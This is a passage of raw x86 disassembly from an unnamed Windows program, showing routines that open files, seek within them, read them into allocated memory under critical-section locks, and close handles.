call ds:dword_4E67A8 ;; VirtualFree
mov ecx, [ebp+arg_4]
mov [ecx], eax
push [ebp+arg_0]
mov ecx, ds:dword_4E68E0
call sub_4E08E0
push 0FFFFFFFFh
mov [ebp+var_30], 1
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_30]
jmp short loc_4D4FAE
; ---------------------------------------------------------------------------
loc_4D4F90: ; DATA XREF: _5:004E3340�o
mov eax, ds:dword_4E68E0
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short locret_4D4FAB
mov eax, [ebp+var_28]
add eax, 10h
push eax
call ds:dword_4E3018 ;; RtlLeaveCriticalSection
locret_4D4FAB: ; CODE XREF: sub_4D4ECD+CF�j
retn
; ---------------------------------------------------------------------------
loc_4D4FAC: ; CODE XREF: sub_4D4ECD+50�j
xor eax, eax
loc_4D4FAE: ; CODE XREF: sub_4D4ECD+85�j
; sub_4D4ECD+C1�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
sub_4D4ECD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D4FBF proc near ; CODE XREF: sub_4E051C+17�p
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = byte ptr -4Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E3348
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 44h
push ebx
push esi
push edi
and [ebp+var_20], 0
mov eax, [ebp+arg_14]
and dword ptr [eax], 0
and [ebp+var_24], 0
mov [ebp+var_1C], 2
mov eax, ds:dword_4E68E4
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jz short loc_4D501A
mov eax, [ebp+var_48]
add eax, 10h
push eax
call ds:dword_4E301C ;; RtlEnterCriticalSection
mov [ebp+var_4C], 1
jmp short loc_4D501E
; ---------------------------------------------------------------------------
loc_4D501A: ; CODE XREF: sub_4D4FBF+46�j
and [ebp+var_4C], 0
loc_4D501E: ; CODE XREF: sub_4D4FBF+59�j
movzx eax, [ebp+var_4C]
test eax, eax
jz loc_4D5203
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4E68E4
call sub_4E0871
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jnz short loc_4D505E
push 0FFFFFFFFh
and [ebp+var_54], 0
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_54]
jmp loc_4D5205
; ---------------------------------------------------------------------------
loc_4D505E: ; CODE XREF: sub_4D4FBF+84�j
mov eax, [ebp+var_28]
mov eax, [eax]
mov [ebp+var_2C], eax
mov eax, [ebp+var_2C]
mov eax, [eax]
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov ecx, [ebp+arg_C]
cmp ecx, [eax+8]
jbe short loc_4D5086
push 57h
call ds:dword_4E678C ;; RtlRestoreLastWin32Error
jmp loc_4D51B8
; ---------------------------------------------------------------------------
loc_4D5086: ; CODE XREF: sub_4D4FBF+B8�j
cmp [ebp+arg_10], 0
jnz short loc_4D5098
mov eax, [ebp+var_30]
mov eax, [eax+8]
sub eax, [ebp+arg_C]
mov [ebp+arg_10], eax
loc_4D5098: ; CODE XREF: sub_4D4FBF+CB�j
mov eax, [ebp+arg_10]
add eax, [ebp+arg_C]
mov ecx, [ebp+var_30]
cmp eax, [ecx+8]
jbe short loc_4D50B3
push 57h
call ds:dword_4E678C ;; RtlRestoreLastWin32Error
jmp loc_4D51B8
; ---------------------------------------------------------------------------
loc_4D50B3: ; CODE XREF: sub_4D4FBF+E5�j
mov eax, [ebp+arg_4]
mov [ebp+var_58], eax
cmp [ebp+var_58], 0
jbe short loc_4D50D7
cmp [ebp+var_58], 2
jbe short loc_4D50D0
cmp [ebp+var_58], 0F001Fh
jz short loc_4D50D0
jmp short loc_4D50D7
; ---------------------------------------------------------------------------
loc_4D50D0: ; CODE XREF: sub_4D4FBF+104�j
; sub_4D4FBF+10D�j
mov [ebp+var_1C], 4
loc_4D50D7: ; CODE XREF: sub_4D4FBF+FE�j
; sub_4D4FBF+10F�j
push [ebp+var_1C]
push 1000h
push [ebp+arg_10]
push 0
call ds:dword_4E67A4 ;; VirtualAlloc
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_4D50F8
jmp loc_4D51B8
; ---------------------------------------------------------------------------
loc_4D50F8: ; CODE XREF: sub_4D4FBF+132�j
cmp [ebp+var_1C], 4
jz short loc_4D5119
lea eax, [ebp+var_38]
push eax
push 4
push [ebp+arg_10]
push [ebp+var_20]
call ds:dword_4E67AC ;; VirtualProtect
test eax, eax
jnz short loc_4D5119
jmp loc_4D51B8
; ---------------------------------------------------------------------------
loc_4D5119: ; CODE XREF: sub_4D4FBF+13D�j
; sub_4D4FBF+153�j
push 0
push 0
push [ebp+arg_C]
push [ebp+arg_0]
call sub_4D5421
and [ebp+var_34], 0
loc_4D512C: ; CODE XREF: sub_4D4FBF+1B4�j
mov eax, [ebp+var_34]
cmp eax, [ebp+arg_10]
jnb short loc_4D5175
and [ebp+var_40], 0
lea eax, [ebp+var_3C]
push eax
push 0
lea eax, [ebp+var_40]
push eax
mov eax, [ebp+arg_10]
sub eax, [ebp+var_34]
push eax
mov eax, [ebp+var_20]
add eax, [ebp+var_34]
push eax
push [ebp+arg_0]
call sub_4D6177
test eax, eax
jz short loc_4D5168
cmp [ebp+var_3C], 0
jz short loc_4D5168
cmp [ebp+var_40], 0
jnz short loc_4D516A
loc_4D5168: ; CODE XREF: sub_4D4FBF+19B�j
; sub_4D4FBF+1A1�j
jmp short loc_4D51B8
; ---------------------------------------------------------------------------
loc_4D516A: ; CODE XREF: sub_4D4FBF+1A7�j
mov eax, [ebp+var_34]
add eax, [ebp+var_40]
mov [ebp+var_34], eax
jmp short loc_4D512C
; ---------------------------------------------------------------------------
loc_4D5175: ; CODE XREF: sub_4D4FBF+173�j
cmp [ebp+var_1C], 4
jz short loc_4D5194
lea eax, [ebp+var_44]
push eax
push [ebp+var_1C]
push [ebp+arg_10]
push [ebp+var_20]
call ds:dword_4E67AC ;; VirtualProtect
test eax, eax
jnz short loc_4D5194
jmp short loc_4D51B8
; ---------------------------------------------------------------------------
loc_4D5194: ; CODE XREF: sub_4D4FBF+1BA�j
; sub_4D4FBF+1D1�j
push [ebp+var_2C]
push [ebp+var_20]
mov ecx, ds:dword_4E68E0
call sub_4D1000
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_20]
mov [eax], ecx
and [ebp+var_20], 0
mov [ebp+var_24], 1
loc_4D51B8: ; CODE XREF: sub_4D4FBF+C2�j
; sub_4D4FBF+EF�j ...
push 0FFFFFFFFh
mov [ebp+var_5C], 1
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_5C]
jmp short loc_4D5205
; ---------------------------------------------------------------------------
loc_4D51D1: ; DATA XREF: _5:004E3350�o
mov eax, ds:dword_4E68E4
mov [ebp+var_50], eax
cmp [ebp+var_50], 0
jz short loc_4D51EC
mov eax, [ebp+var_50]
add eax, 10h
push eax
call ds:dword_4E3018 ;; RtlLeaveCriticalSection
loc_4D51EC: ; CODE XREF: sub_4D4FBF+21E�j
cmp [ebp+var_20], 0
jz short locret_4D5202
push 8000h
push 0
push [ebp+var_20]
call ds:dword_4E67A8 ;; VirtualFree
locret_4D5202: ; CODE XREF: sub_4D4FBF+231�j
retn
; ---------------------------------------------------------------------------
loc_4D5203: ; CODE XREF: sub_4D4FBF+65�j
xor eax, eax
loc_4D5205: ; CODE XREF: sub_4D4FBF+9A�j
; sub_4D4FBF+210�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
sub_4D4FBF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D5216 proc near ; CODE XREF: sub_4E04A4+11�p
; sub_4E04E0+11�p
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004D5333 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E3358
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 1Ch
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
mov eax, ds:dword_4E68E4
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short loc_4D5262
mov eax, [ebp+var_28]
add eax, 10h
push eax
call ds:dword_4E301C ;; RtlEnterCriticalSection
mov [ebp+var_2C], 1
jmp short loc_4D5266
; ---------------------------------------------------------------------------
loc_4D5262: ; CODE XREF: sub_4D5216+37�j
and [ebp+var_2C], 0
loc_4D5266: ; CODE XREF: sub_4D5216+4A�j
movzx eax, [ebp+var_2C]
test eax, eax
jz loc_4D5333
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4E68E4
call sub_4E0871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_4D530C
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+var_1C]
mov eax, [eax]
mov eax, [eax+0Ch]
push dword ptr [eax+0Ch]
call ds:dword_4E66A8 ;; CreateFileA
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov eax, [ebp+arg_4]
cmp dword ptr [eax], 0
jz short loc_4D52F3
push 10h
call sub_4DD35A
pop ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_20], eax
mov esi, [ebp+var_1C]
mov edi, [ebp+var_20]
movsd
movsd
movsd
movsd
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_4]
mov ecx, [ecx]
mov [eax+8], ecx
push [ebp+var_20]
mov eax, [ebp+arg_4]
push dword ptr [eax]
mov ecx, ds:dword_4E68E4
call sub_4E098E
loc_4D52F3: ; CODE XREF: sub_4D5216+A2�j
push 0FFFFFFFFh
mov [ebp+var_34], 1
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_34]
jmp short loc_4D5335
; ---------------------------------------------------------------------------
loc_4D530C: ; CODE XREF: sub_4D5216+75�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4D5317
jmp short loc_4D5333
sub_4D5216 endp
; =============== S U B R O U T I N E =======================================
sub_4D5317 proc near ; CODE XREF: sub_4D5216+FA�p
; DATA XREF: _5:004E3360�o
mov eax, ds:dword_4E68E4
mov [ebp-30h], eax
cmp dword ptr [ebp-30h], 0
jz short locret_4D5332
mov eax, [ebp-30h]
add eax, 10h
push eax
call ds:dword_4E3018 ;; RtlLeaveCriticalSection
locret_4D5332: ; CODE XREF: sub_4D5317+C�j
retn
sub_4D5317 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D5216
loc_4D5333: ; CODE XREF: sub_4D5216+56�j
; sub_4D5216+FF�j
xor eax, eax
loc_4D5335: ; CODE XREF: sub_4D5216+F4�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_4D5216
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D5346 proc near ; CODE XREF: sub_4D13F3+17�p
; sub_4D4036+39�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 0
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_4D653F
test eax, eax
jz loc_4D541B
movzx eax, [ebp+var_C]
test eax, eax
jnz loc_4D541B
mov eax, [ebp+var_4]
mov eax, [eax]
mov [ebp+var_8], eax
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+var_4]
mov eax, [eax+0Ch]
push dword ptr [eax+0Ch]
call ds:dword_4E66A8 ;; CreateFileA
mov ecx, [ebp+arg_C]
mov [ecx], eax
mov eax, [ebp+arg_C]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_4D5416
push 0
push 0
mov eax, [ebp+var_8]
push dword ptr [eax+4]
mov eax, [ebp+arg_C]
push dword ptr [eax]
call ds:dword_4E6788 ;; SetFilePointer
push 10h
call sub_4DD35A
pop ecx
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov eax, [ebp+var_10]
mov ecx, [ebp+arg_C]
mov ecx, [ecx]
mov [eax+8], ecx
mov eax, [ebp+var_10]
and dword ptr [eax+4], 0
movzx eax, [ebp+arg_10]
neg eax
sbb eax, eax
and eax, 0C0000000h
add eax, 40000000h
mov ecx, [ebp+var_10]
mov [ecx+0Ch], eax
push [ebp+var_10]
mov eax, [ebp+arg_C]
push dword ptr [eax]
mov ecx, ds:dword_4E68E4
call sub_4D1000
loc_4D5416: ; CODE XREF: sub_4D5346+63�j
push 1
pop eax
jmp short locret_4D541D
; ---------------------------------------------------------------------------
loc_4D541B: ; CODE XREF: sub_4D5346+20�j
; sub_4D5346+2C�j
xor eax, eax
locret_4D541D: ; CODE XREF: sub_4D5346+D3�j
leave
retn 14h
sub_4D5346 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D5421 proc near ; CODE XREF: sub_4D4FBF+164�p
; sub_4DABD7+11D�p ...
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
; FUNCTION CHUNK AT 004D565F SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E3368
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 24h
push ebx
push esi
push edi
cmp [ebp+arg_C], 0
jnz short loc_4D5452
lea eax, [ebp+var_1C]
mov [ebp+arg_C], eax
loc_4D5452: ; CODE XREF: sub_4D5421+29�j
mov eax, ds:dword_4E68E4
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_4D5473
mov eax, [ebp+var_2C]
add eax, 10h
push eax
call ds:dword_4E301C ;; RtlEnterCriticalSection
mov [ebp+var_30], 1
jmp short loc_4D5477
; ---------------------------------------------------------------------------
loc_4D5473: ; CODE XREF: sub_4D5421+3D�j
and [ebp+var_30], 0
loc_4D5477: ; CODE XREF: sub_4D5421+50�j
movzx eax, [ebp+var_30]
test eax, eax
jz loc_4D565F
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4E68E4
call sub_4E0871
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz loc_4D5638
mov eax, [ebp+var_24]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_20], eax
mov eax, [ebp+var_24]
mov eax, [eax+0Ch]
and eax, 1
test eax, eax
jz short loc_4D54EB
push [ebp+arg_8]
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E6788 ;; SetFilePointer
mov ecx, [ebp+arg_C]
mov [ecx], eax
push 0FFFFFFFFh
mov [ebp+var_38], 1
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp loc_4D5661
; ---------------------------------------------------------------------------
loc_4D54EB: ; CODE XREF: sub_4D5421+96�j
mov eax, [ebp+var_24]
mov eax, [eax+4]
mov [ebp+var_28], eax
cmp [ebp+arg_8], 0
jnz short loc_4D554D
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_4]
cmp ecx, [eax+8]
jle short loc_4D551E
mov eax, [ebp+var_24]
mov ecx, [ebp+var_20]
mov ecx, [ecx+8]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
jmp short loc_4D5548
; ---------------------------------------------------------------------------
loc_4D551E: ; CODE XREF: sub_4D5421+E2�j
cmp [ebp+arg_4], 0
jge short loc_4D5537
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 83h
call ds:dword_4E678C ;; RtlRestoreLastWin32Error
jmp short loc_4D5548
; ---------------------------------------------------------------------------
loc_4D5537: ; CODE XREF: sub_4D5421+101�j
mov eax, [ebp+var_24]
mov ecx, [ebp+arg_4]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_4]
mov [eax], ecx
loc_4D5548: ; CODE XREF: sub_4D5421+FB�j
; sub_4D5421+114�j
jmp loc_4D561F
; ---------------------------------------------------------------------------
loc_4D554D: ; CODE XREF: sub_4D5421+D7�j
cmp [ebp+arg_8], 2
jnz short loc_4D55AE
cmp [ebp+arg_4], 0
jle short loc_4D5572
mov eax, [ebp+var_24]
mov ecx, [ebp+var_20]
mov ecx, [ecx+8]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
jmp short loc_4D55AC
; ---------------------------------------------------------------------------
loc_4D5572: ; CODE XREF: sub_4D5421+136�j
mov eax, [ebp+var_20]
mov eax, [eax+8]
neg eax
cmp [ebp+arg_4], eax
jge short loc_4D5592
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 83h
call ds:dword_4E678C ;; RtlRestoreLastWin32Error
jmp short loc_4D55AC
; ---------------------------------------------------------------------------
loc_4D5592: ; CODE XREF: sub_4D5421+15C�j
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_4]
add ecx, [eax+8]
mov eax, [ebp+var_24]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
loc_4D55AC: ; CODE XREF: sub_4D5421+14F�j
; sub_4D5421+16F�j
jmp short loc_4D561F
; ---------------------------------------------------------------------------
loc_4D55AE: ; CODE XREF: sub_4D5421+130�j
cmp [ebp+arg_8], 1
jnz short loc_4D5611
mov eax, [ebp+arg_4]
add eax, [ebp+var_28]
mov ecx, [ebp+var_20]
cmp eax, [ecx+8]
jle short loc_4D55DB
mov eax, [ebp+var_24]
mov ecx, [ebp+var_20]
mov ecx, [ecx+8]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
jmp short loc_4D560F
; ---------------------------------------------------------------------------
loc_4D55DB: ; CODE XREF: sub_4D5421+19F�j
mov eax, [ebp+var_28]
add eax, [ebp+arg_4]
test eax, eax
jge short loc_4D55F8
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 83h
call ds:dword_4E678C ;; RtlRestoreLastWin32Error
jmp short loc_4D560F
; ---------------------------------------------------------------------------
loc_4D55F8: ; CODE XREF: sub_4D5421+1C2�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_28]
mov ecx, [ebp+var_24]
mov [ecx+4], eax
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
loc_4D560F: ; CODE XREF: sub_4D5421+1B8�j
; sub_4D5421+1D5�j
jmp short loc_4D561F
; ---------------------------------------------------------------------------
loc_4D5611: ; CODE XREF: sub_4D5421+191�j
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 57h
call ds:dword_4E678C ;; RtlRestoreLastWin32Error
loc_4D561F: ; CODE XREF: sub_4D5421:loc_4D5548�j
; sub_4D5421:loc_4D55AC�j ...
push 0FFFFFFFFh
mov [ebp+var_3C], 1
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_3C]
jmp short loc_4D5661
; ---------------------------------------------------------------------------
loc_4D5638: ; CODE XREF: sub_4D5421+7B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4D5643
jmp short loc_4D565F
sub_4D5421 endp
; =============== S U B R O U T I N E =======================================
sub_4D5643 proc near ; CODE XREF: sub_4D5421+21B�p
; DATA XREF: _5:004E3370�o
mov eax, ds:dword_4E68E4
mov [ebp-34h], eax
cmp dword ptr [ebp-34h], 0
jz short locret_4D565E
mov eax, [ebp-34h]
add eax, 10h
push eax
call ds:dword_4E3018 ;; RtlLeaveCriticalSection
locret_4D565E: ; CODE XREF: sub_4D5643+C�j
retn
sub_4D5643 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D5421
loc_4D565F: ; CODE XREF: sub_4D5421+5C�j
; sub_4D5421+220�j
xor eax, eax
loc_4D5661: ; CODE XREF: sub_4D5421+C5�j
; sub_4D5421+215�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 10h
; END OF FUNCTION CHUNK FOR sub_4D5421
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D5672 proc near ; CODE XREF: sub_4D6CC4+80�p
; sub_4DA456+58�p ...
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004D572E SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E3378
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
mov eax, ds:dword_4E68E4
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4D56B8
mov eax, [ebp+var_20]
add eax, 10h
push eax
call ds:dword_4E301C ;; RtlEnterCriticalSection
mov [ebp+var_24], 1
jmp short loc_4D56BC
; ---------------------------------------------------------------------------
loc_4D56B8: ; CODE XREF: sub_4D5672+31�j
and [ebp+var_24], 0
loc_4D56BC: ; CODE XREF: sub_4D5672+44�j
movzx eax, [ebp+var_24]
test eax, eax
jz short loc_4D572E
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4E68E4
call sub_4E0871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_4D5707
mov eax, [ebp+var_1C]
mov eax, [eax]
mov eax, [eax]
mov ecx, [ebp+arg_4]
mov eax, [eax+8]
mov [ecx], eax
push 0FFFFFFFFh
mov [ebp+var_2C], 1
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_4D5730
; ---------------------------------------------------------------------------
loc_4D5707: ; CODE XREF: sub_4D5672+6B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4D5712
jmp short loc_4D572E
sub_4D5672 endp
; =============== S U B R O U T I N E =======================================
sub_4D5712 proc near ; CODE XREF: sub_4D5672+99�p
; DATA XREF: _5:004E3380�o
mov eax, ds:dword_4E68E4
mov [ebp-28h], eax
cmp dword ptr [ebp-28h], 0
jz short locret_4D572D
mov eax, [ebp-28h]
add eax, 10h
push eax
call ds:dword_4E3018 ;; RtlLeaveCriticalSection
locret_4D572D: ; CODE XREF: sub_4D5712+C�j
retn
sub_4D5712 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D5672
loc_4D572E: ; CODE XREF: sub_4D5672+50�j
; sub_4D5672+9E�j
xor eax, eax
loc_4D5730: ; CODE XREF: sub_4D5672+93�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_4D5672
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D5741 proc near ; CODE XREF: sub_4D13F3+58�p
; sub_4D412B+22�p ...
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E3388
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 20h
push ebx
push esi
push edi
cmp [ebp+arg_4], 0
jnz short loc_4D5772
lea eax, [ebp+var_1C]
mov [ebp+arg_4], eax
loc_4D5772: ; CODE XREF: sub_4D5741+29�j
mov eax, ds:dword_4E68E4
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short loc_4D5793
mov eax, [ebp+var_28]
add eax, 10h
push eax
call ds:dword_4E301C ;; RtlEnterCriticalSection
mov [ebp+var_2C], 1
jmp short loc_4D5797
; ---------------------------------------------------------------------------
loc_4D5793: ; CODE XREF: sub_4D5741+3D�j
and [ebp+var_2C], 0
loc_4D5797: ; CODE XREF: sub_4D5741+50�j
movzx eax, [ebp+var_2C]
test eax, eax
jz loc_4D5845
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4E68E4
call sub_4E0871
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4D5809
mov eax, [ebp+var_20]
push dword ptr [eax+8]
call ds:dword_4E66A4 ;; CloseHandle
push [ebp+arg_0]
mov ecx, ds:dword_4E68E4
call sub_4E08E0
mov eax, [ebp+var_20]
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_4DD3DD
pop ecx
mov eax, [ebp+arg_4]
mov dword ptr [eax], 1
push 0FFFFFFFFh
mov [ebp+var_34], 1
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_34]
jmp short loc_4D5847
; ---------------------------------------------------------------------------
loc_4D5809: ; CODE XREF: sub_4D5741+7B�j
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4D4818
push 0FFFFFFFFh
mov [ebp+var_38], eax
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp short loc_4D5847
; ---------------------------------------------------------------------------
loc_4D5829: ; DATA XREF: _5:004E3390�o
mov eax, ds:dword_4E68E4
mov [ebp+var_30], eax
cmp [ebp+var_30], 0
jz short locret_4D5844
mov eax, [ebp+var_30]
add eax, 10h
push eax
call ds:dword_4E3018 ;; RtlLeaveCriticalSection
locret_4D5844: ; CODE XREF: sub_4D5741+F4�j
retn
; ---------------------------------------------------------------------------
loc_4D5845: ; CODE XREF: sub_4D5741+5C�j
xor eax, eax
loc_4D5847: ; CODE XREF: sub_4D5741+C6�j
; sub_4D5741+E6�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
sub_4D5741 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D5858 proc near ; CODE XREF: _4:004DF722�p
var_30 = dword ptr -30h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 004D593D SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E3398
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
cmp [ebp+arg_8], 0
jnz short loc_4D5889
lea eax, [ebp+var_1C]
mov [ebp+arg_8], eax
loc_4D5889: ; CODE XREF: sub_4D5858+29�j
mov eax, ds:dword_4E68E4
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_4D58AA
mov eax, [ebp+var_24]
add eax, 10h
push eax
call ds:dword_4E301C ;; RtlEnterCriticalSection
mov [ebp+var_28], 1
jmp short loc_4D58AE
; ---------------------------------------------------------------------------
loc_4D58AA: ; CODE XREF: sub_4D5858+3D�j
and [ebp+var_28], 0
loc_4D58AE: ; CODE XREF: sub_4D5858+50�j
movzx eax, [ebp+var_28]
test eax, eax
jz loc_4D593D
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4E68E4
call sub_4E0871
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4D5916
push [ebp+arg_4]
